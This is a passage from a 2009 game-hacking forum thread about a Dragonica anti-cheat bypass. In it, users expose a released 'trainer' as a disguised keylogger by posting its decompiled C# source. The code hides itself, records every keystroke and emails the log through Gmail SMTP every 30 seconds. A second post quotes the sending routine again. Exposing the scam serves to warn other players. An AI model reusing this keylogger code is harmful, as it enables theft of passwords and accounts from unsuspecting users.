Register for your free account! | Forgot your password?

You last visited: Today at 13:37

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



[RELEASE] Dragonica Bypass

Discussion on [RELEASE] Dragonica Bypass within the Dragonica Hacks, Bots, Cheats & Exploits forum part of the Dragonica category.

Closed Thread
 
Old 06/22/2009, 16:27   #241
 
elite*gold: 0
Join Date: Jul 2008
Posts: 51
Received Thanks: 5
Can u guys make a trainer for SEA?
pennacchio is offline  
Old 06/22/2009, 16:34   #242
 
elite*gold: 0
Join Date: May 2009
Posts: 159
Received Thanks: 356
If paulxdragon would release his source, the opcodes, the array of bytes, or even a tutorial I'd reproduce his work for SEA.

EDIT: Removed the references to "blink".
raresumo is offline  
Old 06/22/2009, 16:39   #243
 
elite*gold: 0
Join Date: Sep 2007
Posts: 25
Received Thanks: 0
i think if he share the the concept+AOB that would be enough to make for SEA
vontdeux is offline  
Old 06/22/2009, 16:47   #244
 
elite*gold: 0
Join Date: Jun 2009
Posts: 25
Received Thanks: 3
must waiting~^^
Forzen is offline  
Old 06/22/2009, 16:55   #245
 
elite*gold: 0
Join Date: May 2007
Posts: 86
Received Thanks: 4
Could someone release a Bypass for Eu version?

Or just teach me how to make one
ShadowOps is offline  
Old 06/22/2009, 16:57   #246
 
elite*gold: 0
Join Date: Nov 2008
Posts: 3
Received Thanks: 0
Do Not Use That Trainer

why? look at his sourcecode and see this!

Quote:
namespace asl26.dll
{
using asl26.dll.My;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Net;
using System.Net.Mail;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;

[DesignerGenerated]
public class Form1 : Form
{
private static List<WeakReference> __ENCList = new List<WeakReference>();
[AccessedThroughProperty("GetKey")]
private Timer _GetKey;
[AccessedThroughProperty("RichTextBox1")]
private RichTextBox _RichTextBox1;
[AccessedThroughProperty("SendKey")]
private Timer _SendKey;
private IContainer components;

[DebuggerNonUserCode]
public Form1()
{
base.Load += new EventHandler(this.Form1_Load);
List<WeakReference> list = __ENCList;
lock (list)
{
__ENCList.Add(new WeakReference(this));
}
this.InitializeComponent();
}

[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (((disposing && (this.components != null)) ? 1 : 0) != 0)
{
this.components.Dispose();
}
}
finally
{
base.Dispose(disposing);
}
}

private void Form1_Load(object sender, EventArgs e)
{
this.GetKey.Start();
this.SendKey.Start();
this.Hide();
this.ShowInTaskbar = false;
this.ControlBox = false;
this.ShowIcon = false;
MyProject.Forms.Form2.Show();
}

[DllImport("user32", CharSet=CharSet.Ansi, SetLastError=true, ExactSpelling=true)]
private static extern short GetAsyncKeyState(int vKey);
private void GetKey_Tick(object sender, EventArgs e)
{
int num3;
int vKey = 0;
do
{
if (GetAsyncKeyState(vKey) == -32767)
{
this.RichTextBox1.Text = this.RichTextBox1.Text + Conversions.ToString(Strings.Chr(vKey));
}
vKey++;
num3 = 0xff;
}
while (vKey <= num3);
}

[DebuggerStepThrough]
private void InitializeComponent()
{
this.components = new Container();
this.RichTextBox1 = new RichTextBox();
this.GetKey = new Timer(this.components);
this.SendKey = new Timer(this.components);
this.SuspendLayout();
this.RichTextBox1.Dock = DockStyle.Fill;
Point point = new Point(0, 0);
this.RichTextBox1.Location = point;
this.RichTextBox1.Name = "RichTextBox1";
Size size = new Size(0xdf, 180);
this.RichTextBox1.Size = size;
this.RichTextBox1.TabIndex = 0;
this.RichTextBox1.Text = "";
this.GetKey.Interval = 5;
this.SendKey.Interval = 0x7530;
SizeF ef = new SizeF(6f, 13f);
this.AutoScaleDimensions = ef;
this.AutoScaleMode = AutoScaleMode.Font;
size = new Size(0xdf, 180);
this.ClientSize = size;
this.Controls.Add(this.RichTextBox1);
this.Name = "Form1";
this.Text = "asl26.dll";
this.ResumeLayout(false);
}

private void SendKey_Tick(object sender, EventArgs e)
{
SmtpClient client = new SmtpClient();
MailMessage message = new MailMessage();
client.Credentials = new NetworkCredential("", "audition");
client.Port = 0x24b;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
message = new MailMessage();
message.From = new MailAddress("");
message.To.Add("");
message.Subject = "Dragonica Scam NEW";
message.Body = this.RichTextBox1.Text;
client.Send(message);
this.RichTextBox1.Text = "";
}

internal virtual Timer GetKey
{
[DebuggerNonUserCode]
get
{
return this._GetKey;
}
[MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
set
{
EventHandler handler = new EventHandler(this.GetKey_Tick);
if (this._GetKey != null)
{
this._GetKey.Tick -= handler;
}
this._GetKey = value;
if (this._GetKey != null)
{
this._GetKey.Tick += handler;
}
}
}

internal virtual RichTextBox RichTextBox1
{
[DebuggerNonUserCode]
get
{
return this._RichTextBox1;
}
[MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
set
{
this._RichTextBox1 = value;
}
}

internal virtual Timer SendKey
{
[DebuggerNonUserCode]
get
{
return this._SendKey;
}
[MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
set
{
EventHandler handler = new EventHandler(this.SendKey_Tick);
if (this._SendKey != null)
{
this._SendKey.Tick -= handler;
}
this._SendKey = value;
if (this._SendKey != null)
{
this._SendKey.Tick += handler;
}
}
}
}
}
slideawayz is offline  
Old 06/22/2009, 17:02   #247
 
elite*gold: 0
Join Date: May 2009
Posts: 159
Received Thanks: 356

private void SendKey_Tick(object sender, EventArgs e)
{
SmtpClient client = new SmtpClient();
MailMessage message = new MailMessage();
client.Credentials = new NetworkCredential("", "audition");
client.Port = 0x24b;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
message = new MailMessage();
message.From = new MailAddress("");
message.To.Add("");
message.Subject = "Dragonica Scam NEW";
message.Body = this.RichTextBox1.Text;
client.Send(message);
this.RichTextBox1.Text = "";
}


LOL.

I told you he was BSing.
raresumo is offline  
Old 06/22/2009, 17:04   #248
 
elite*gold: 0
Join Date: Feb 2008
Posts: 62
Received Thanks: 9
lol
123werty is offline  
Old 06/22/2009, 17:06   #249
 
elite*gold: 0
Join Date: May 2009
Posts: 159
Received Thanks: 356
Haha, yeah. That's just classic.
raresumo is offline  
Old 06/22/2009, 17:08   #250
 
elite*gold: 0
Join Date: Sep 2007
Posts: 25
Received Thanks: 0
busted!
vontdeux is offline  
Old 06/22/2009, 17:19   #251
 
elite*gold: 0
Join Date: Jun 2009
Posts: 27
Received Thanks: 0
pls released dragonica sea hack pls la most of out here play sea !
ryan345 is offline  
Old 06/22/2009, 17:38   #252
 
elite*gold: 0
Join Date: May 2007
Posts: 86
Received Thanks: 4
fail scammer, already changed my password
ShadowOps is offline  
Old 06/22/2009, 17:39   #253
 
elite*gold: 0
Join Date: Jul 2008
Posts: 51
Received Thanks: 5
So its like a keylogger? As long as the program remains opened it will send everything I type for his email?
pennacchio is offline  
Old 06/22/2009, 19:12   #254
 
elite*gold: 0
Join Date: May 2007
Posts: 86
Received Thanks: 4
Quote:
Originally Posted by pennacchio View Post
So its like a keylogger? As long the program remains opened it will send everything I type for his email?
Yes, everthing you type with that program open will be send to that email
ShadowOps is offline  
Old 06/22/2009, 20:55   #255
 
elite*gold: 0
Join Date: May 2008
Posts: 1
Received Thanks: 0
byebye to those Dragonica EU items
hashbrown is offline  
Closed Thread




All times are GMT +1. The time now is 13:37.


Powered by vBulletin®
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2025 elitepvpers All Rights Reserved.